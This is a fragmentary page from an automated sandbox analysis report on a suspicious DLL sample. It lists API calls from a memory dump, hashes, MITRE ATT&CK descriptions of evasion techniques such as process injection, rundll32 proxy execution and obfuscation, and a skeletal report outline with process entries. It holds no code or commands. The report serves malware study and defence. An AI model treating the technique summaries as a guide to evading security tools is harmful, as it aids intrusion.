MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6E214C0F
GetLastError.KERNEL32 ref: 6E214C1D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6E214C78

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b831570c26da9ca51d630a9a3157c34ea6dbe8a4de720837e15dfbd2bb11556b
Instruction ID: d4606820ad02b41b021931bd56f407ae649bb116670555c9f97a652c2e010253
Opcode Fuzzy Hash: b831570c26da9ca51d630a9a3157c34ea6dbe8a4de720837e15dfbd2bb11556b
Instruction Fuzzy Hash: 2E41F97560820FAFDB118FE5C844BEA7BFBEF41329F104159EA5DA7190D7328A02C7A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report WoyEsA8v7H.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5300 Parent PID: 5728

General

Analysis Process: cmd.exe PID: 5284 Parent PID: 5300